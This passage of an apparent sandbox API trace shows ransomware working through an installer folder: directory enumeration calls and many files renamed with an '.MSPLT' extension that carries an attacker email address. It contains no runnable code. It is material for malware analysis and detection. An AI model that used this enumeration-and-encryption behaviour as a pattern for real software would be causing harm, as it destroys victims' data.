ftCreationTime.dwLowDateTime=0x5bf1a8f6, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf1a8f6, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf1a8f6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.550] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be35a54, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be35a54, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be5bbc3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.550] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be35a54, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be35a54, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be5bbc3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.550] FindClose (in: hFindFile=0x3947f28 | out: hFindFile=0x3947f28) returned 1 [0284.557] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.557] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0284.558] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.558] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948028 [0284.567] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.567] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bfd9334, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bfd9334, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bfff512, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.567] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bfff512, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bfff512, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bfff512, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.567] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be8807a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be8807a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c029b40, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.568] FindNextFileW (in: hFindFile=0x3948028, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be8807a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be8807a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c029b40, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.568] FindClose (in: hFindFile=0x3948028 | out: hFindFile=0x3948028) returned 1 [0284.569] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.569] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0284.569] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.569] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39480a8 [0284.571] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.571] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c097f88, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c097f88, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c0be232, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xce4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0284.571] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c0be232, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c0be232, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c0be232, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13976, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0284.571] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bea7fff, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bea7fff, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bece217, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0284.571] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bea7fff, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bea7fff, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bece217, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0284.571] FindClose (in: hFindFile=0x39480a8 | out: hFindFile=0x39480a8) returned 1 [0284.573] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.573] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0284.573] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.573] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f28 [0284.574] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.574] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c0e434b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c0e434b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c17ce12, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x31546, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARAME~1.MSP")) returned 1 [0284.575] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4a1cc4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 1 [0284.575] FindNextFileW (in: hFindFile=0x3947f28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4a1cc4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 0 [0284.575] FindClose (in: hFindFile=0x3947f28 | out: hFindFile=0x3947f28) returned 1 [0284.576] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.576] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c2fa478, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c2fa478, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c3432af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DHTMLH~1.MSP")) returned 1 [0284.576] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bf8cf21, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf8cf21, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf8cf21, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x15ad2, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DisplayIcon.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DISPLA~1.MSP")) returned 1 [0284.576] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Extended", cAlternateFileName="")) returned 1 [0284.577] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.577] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0284.578] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.578] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c42f540, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x16d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARAME~1.MSP")) returned 1 [0284.578] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c45db08, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 1 [0284.578] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c40929b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c40929b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c45db08, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="UIINFO~1.MSP")) returned 0 [0284.578] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0284.580] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.580] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0284.580] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.580] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0284.582] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.582] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c595da7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PRINTI~1.MSP")) returned 1 [0284.582] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c04bbad, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c04bbad, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c04bbad, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate1.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~1.MSP")) returned 1 [0284.582] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c071cfd, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c071cfd, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c071cfd, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate2.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~2.MSP")) returned 1 [0284.582] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c47baec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c47baec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c4fd117, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate3.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~3.MSP")) returned 1 [0284.582] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c56fcb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c56fcb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c595da7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate4.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="RODDC7~1.MSP")) returned 1 [0284.583] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c5285f7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c5285f7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c56fcb8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate5.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROTATE~4.MSP")) returned 1 [0284.583] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c56fcb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c56fcb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ceacc74, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate6.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="ROC0D7~1.MSP")) returned 1 [0284.583] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c595da7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c595da7, ftLastAccessTime.dwHighDateTime=0x1d6097d, 